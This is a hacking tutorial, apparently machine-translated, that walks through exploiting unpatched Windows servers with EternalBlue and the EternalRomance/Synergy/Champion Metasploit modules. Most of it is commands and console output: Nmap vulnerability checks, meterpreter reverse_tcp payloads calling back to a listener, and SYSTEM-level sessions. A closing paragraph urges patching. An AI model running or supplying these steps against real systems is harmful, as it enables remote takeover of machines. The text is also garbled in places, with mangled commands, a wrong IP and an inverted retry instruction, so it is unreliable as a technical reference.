Certain vulnerabilities and exploits make headlines with their catchy names and impressive damage potential. EternalBlue is one of those exploits. Originally bound to the NSA, this zero-day exploded an error in the SMB protocol that affected many Windows computers and caused devastation everywhere. Here we will use EternalBlue to exploit SMB via Metasploit.
What is EternalBlue?
EternalBlue is an exploit most likely developed by the NSA as a previous zero-day. It was released in 2017 by Shadow Brokers, a hacker group known for the leak of tools and exploits used by the Equation Group, which may have links to the NSA's Tailored Access Operations unit.
EternalBlue, also known as MS1
EternalBlue was mainly responsible for the outbreaks WannaCry, NotPetya and BadRabbit as well as the EternalRocks worm. Option 1: Exploit EternalBlue Metasploit
We are using an unpatched copy of Windows Server 2008 R2 as the target for the first section of this tutorial. An evaluation version can be downloaded from from Microsoft so that you can better understand it.
Step 1: Find a module to use
The first thing we need to do is open the terminal and start Metasploit. Enter service postgresql start to initialize the PostgreSQL database if it is not already running, followed by msfconsole .
service postgresql start msfconsole
Then use the search command in Metasploit to find a suitable module.
Matching Modules ================== Date of disclosure of the name Rank Check the description ---- --------------- ---- ----- ----------- Auxiliary / admin / smb / ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance / EternalSynergy / EternalChampion SMB Remote Windows Command Execution Auxiliary device / scanner / smb / smb_ms17_010 normal Yes MS17-010 SMB-RCE detection Exploit / windows / smb / ms17_010_eternalblue 2017-03-14 Average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool corruption Exploit / windows / smb / ms17_010_eternalblue_win8 2017-03-14 Average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8 + Exploit / windows / smb / ms17_010_psexec 2017-03-14 normal No MS17-010 EternalRomance / EternalSynergy / EternalChampion SMB Remote Windows Code Execution
There is an additional scanner that can be used to determine if a target is vulnerable for MS17-010 is. It is always a good idea to do the necessary reconstruction like this. Otherwise, you could waste a lot of time if the target is not even vulnerable.
If we have determined that our target is actually vulnerable to EternalBlue, we can use the following exploit module to do the search we just performed.
use Exploit / windows / smb / ms17_010_eternalblue
You know that you're good when you see the prompt "Exploit (windows / smb / ms17_010_eternalblue)".
You can view the current settings with the command .
Module Options (Exploit / windows / smb / ms17_010_eternalblue): Name Current setting Required description ---- --------------- -------- ----------- RHOSTS yes The destination address range or CIDR identifier RPORT 445 Yes The destination port (TCP) SMB domain. no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified user name SMBUser no (Optional) The user name under which to authenticate VERIFY_ARCH true yes Verify that the remote architecture matches the exploit destination. VERIFY_TARGET true yes Verifies that the remote operating system matches the exploit destination. Exploit target: ID name - ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs
First, you must specify the IP address of the destination.
Rhosts set 10.10.0.101
Rhosts => 10.10.0.101
Next we can load the trusty reverse_tcp shell as a payload.
setloadload windows / x64 / meterpreter / reverse_tcp
payload => windows / x64 / meterpreter / reverse_tcp
Lastly, set the Listening Host setting to the IP address of our local computer.
Set lhost 10.10.0.1
lhost => 10.10.0.1
And the listening port is set to an appropriate number.
lport => 4321
That should be all, so all you have to do is start the exploit. Use the command run to fire it.
[*] Launched a reverse TCP handler on 10.10.0.1:4321 [*] 10.10.0.101:445 - Connection with target for exploitation. [+] 10.10.0.101:445 - Connection made for exploitation. [+] 10.10.0.101:445 - The selected target operating system is valid for the operating system specified by the SMB response [*] 10.10.0.101:445 - CORE buffer for raw buffer (51 bytes) [*] 10.10.0.101:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2 [*] 10.10.0.101:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard [*] 10.10.0.101:445 - 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac [*] 10.10.0.101:445 - 0x00000030 6b 20 31 k 1 [+] 10.10.0.101:445 - Target arc selected, valid for arcs, indicated by DCE / RPC response [*] 10.10.0.101:445 - Try out Exploit with 12 Groom Allocations. [*] 10.10.0.101:445 - Send the exploit package except for the last fragment [*] 10.10.0.101:445 - Starting a non-paged pool maintenance [+] 10.10.0.101:445 - Sending SMBv2 buffers [+] 10.10.0.101:445 - Closing the SMBv1 connection creates a free hole next to the SMBv2 buffer. [*] 10.10.0.101:445 - Sending the last SMBv2 buffer. [*] 10.10.0.101:445 - Last fragment of the exploit package is sent! [*] 10.10.0.101:445 - Received response from the exploit package [+] 10.10.0.101:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 10.10.0.101:445 - Send egg to damaged connection. [*] 10.10.0.101:445 - Triggering a damaged buffer. [*] Transmission level (206403 bytes) to 10.10.0.101 [*] Meterpreter Session 1 has been opened at 2019-03-26 11:01:46 -0500 (10.10.0.1:4321 → 10.10.0.101:49207) [+] 10.10.0.101:445 - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = [+] 10.10.0.101:445 - = - = - = - = - = - = - = - = - = - = - = - = - = - = - WIN - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = [+] 10.10.0.101:445 - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = meterpreter>
We can see a few things here, like making the SMB connection and sending the exploit package. Finally we see a "WIN" and a meterpreter session is opened. Sometimes this exploit does not finish successfully the first time, so it should not be tried and run through again.
We can verify that we have compromised the goal by executing commands such as sysinfo to obtain operating system information.
Computer: S02 Operating System: Windows 2008 R2 (Build 7601, Service Pack 1). Architecture: x64 System language: en_US Domain: DLAB Logged in users: 2 Meterpreter: x64 / windows
and getuid to get the current username.
Server Username: NT AUTHORITY SYSTEM
This exploit is not working very well on newer systems In some cases, the target computer may crash. Next, we will investigate a similar exploit that is a little more reliable, but equally deadly.
Option 2: EternalRomance / EternalSynergy / EternalChampion
As if EternalBlue was not devastating enough, three more similar exploits were developed after that. EternalRomance and EternalSynergy use some kind of confusion (CVE-2017-0143) while EternalChampion and EternalSynergy are using a race condition (CVE-2017-0146).
These were combined in a single Metasploit module that also uses the classic Psexec payload. It is considered more reliable than EternalBlue, it is less likely that the target crashes, and it works with all new, unpatched versions of Windows through Server 2016 and Windows 10.
The only caveat is that this exploit has a Named Pipe required. Named pipes provide a way to perform inter-communication processes, which are usually displayed as a file for other processes to which they can be connected. The Metasploit module automatically checks for named pipes, so it's pretty easy to use as long as there's a named pipe on the target.
Step 1: Find a vulnerable target
We can use Nmap as an alternative to the Metasploit scanner to find out if a target is vulnerable to EternalBlue. The Nmap Scripting Engine is a powerful feature of the core tool that lets you run all sorts of scripts against a target.
Here we use the script smb-vuln-ms17-010 Please check the vulnerability. Our goal is an unpatched copy of Windows Server 2016 Datacenter Edition. Evaluation copies can be downloaded from Microsoft so you can follow them if you want.
We can specify a single script to execute with the option – script together with -v ] flag for verbosity and IP address of our target. First change directories if you are still running metasploit.
cd nmap --script smb-vuln-ms17-010 -v 10.10.0.100
Nmap is running and should not take too long because we're just running a script. At the end of the issue you will find the results.
Starting Nmap 7.70 (https://nmap.org) at 2019-03-26 11:05 CDT NSE: 1 scripts were loaded for scanning. NSE: script precheck. Initiation of the NSE at 11:05 ... Host script results: | smb vuln-ms17-010: | VULNERABLE: | Remote Code Execution Vulnerability on Microsoft SMBv1 Servers (ms17-010) | Condition: VULNERABLE | IDs: CVE: CVE-2017-0143 | Risk Factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | Server (ms17-010). | | Release date: 2017-03-14 | references: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 | https://blogs.technet.microsoft.com/msrc/2017/05/12/kundenberatung-für-wannacrypt-attacks/ | _ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx NSE: script after scanning. Initiation of the NSE at 11:05 NSE finished at 11:05, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Nmap finished: 1 IP address (1 host high) scanned in 2.31 seconds Sent raw packages: 1181 (51.948KB) | Rcvd: 1001 (40.060KB)
We can see that the target and other information such as risk factors and links to CVE are considered vulnerable.
Now that we know that the target is vulnerable, we can return to Metasploit and look for a suitable exploit.
msfconsole search eternalromance
Matching modules ================== Date of disclosure of the name Rank Check the description ---- --------------- ---- ----- ----------- Auxiliary / admin / smb / ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance / EternalSynergy / EternalChampion SMB Remote Windows Command Execution Exploit / windows / smb / ms17_010_psexec 2017-03-14 normal No MS17-010 EternalRomance / EternalSynergy / EternalChampion SMB Remote Windows Code Execution
And use the module in Metasploit with the command . use Exploit / windows / smb / ms17_010_psexec
You will know that you are good when you see the prompt "Exploit (windows / smb / ms17_010_psexec)".
Let's look at our options:
Module options (exploit / windows / smb / ms17_010_psexec): Name Current setting Required description ---- --------------- -------- ----------- DBGTRACE false yes View additional information about the debug trace LEAKATTEMPTS 99 Yes How often do you try to lose the transaction? NAMEDPIPE no A named pipe to connect to (leave blank for auto) NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check RHOSTS yes The destination address range or CIDR identifier RPORT 445 yes The destination port SERVICE_DESCRIPTION not a service description to be used for the nice listing SERVICE_DISPLAY_NAME no The display name of the service SERVICE_NAME no The service name SHARE ADMIN $ yes The share to connect to can be an administrator share (ADMIN $, C $, ...) or a normal read / write folder share SMB domain. no The Windows domain to be used for authentication SMBPass no The password for the specified user name SMBUser no The user name under which to authenticate Exploit target: ID name - ---- 0 Automatic
It looks like this exploit uses a list of named pipes to check and connect to a share. We can leave all this for the time being as standard, but we have to stop the remote host.
Rhodes set 10.10.0.100
Rhosts => 10.10.0.100
And the reverse shell payload.
Payload set windows / x64 / meterpreter / reverse_tcp
payload => windows / x64 / meterpreter / reverse_tcp
And our local host.
set lhost 10.10.0.1
lhost => 10.10.001
and local port.
lport => 4321
We should be fine now. Enter run to start the exploit.
[*] Launched a reverse TCP handler on 10.10.0.1:4321 [*] 10.10.0.100:445 - Target Operating System: Windows Server 2016 Standard Evaluation 14393 [*] 10.10.0.100:445 - A Primitive Write-What-Where ... [+] 10.10.0.100:445 - Overwrite completed ... SYSTEM session received! [*] 10.10.0.100:445 - Select the PowerShell destination [*] 10.10.0.100:445 - Execute the payload ... [+] 10.10.0.100:445 - Service start has expired, OK, if a command is executed or a non-executable file is executed ... [*] Send Level (206403 bytes) to 10.10.0.100 [*] Meterpreter Session 2 was opened on 10.09.0.1:4321 -> 10.10.0.100:49965 at 2019-03-26 11:12:30 -0500
. We can see how the payload runs successfully, and we end up with a meter session.
Again, we can verify that we have compromised the system with commands such as sysinfo
. Computer: DC01 Operating system: Windows 2016 (Build 14393). Architecture: x64 System language: en_US Domain: DLAB Logged in users: 4 Meterpreter: x64 / windows
and getuid .
Server Username: NT AUTHORITY SYSTEM
Prevention and Current Status
Despite all the damage that EternalBlue has caused is a reliable way to prevent these types of exploits: patch your systems ! At this point, almost two years after these vulnerabilities became known, there is really no excuse for unpatched operating systems.
EternalBlue is still a problem, and while the consequences are unfortunate, unfortunately, some organizations will still be doing this on unpatched systems. Combined with pirated versions of Windows, EternalBlue remains a major threat today.
Cryptojacking, in which a victim's computer secretly uses the Mine Cryptov is another threat vector that uses EternalBlue to exploit attacks. WannaMine was one of those outbreaks that abducted computers around the world in 2018.
Today we learned how to use EternalBlue and Metasploit. We also learned that an exploit similar to EB is more reliable and works with more systems. In the next tutorial, we'll dig a little deeper and learn how to use EternalBlue manually, which is much more satisfying in the end.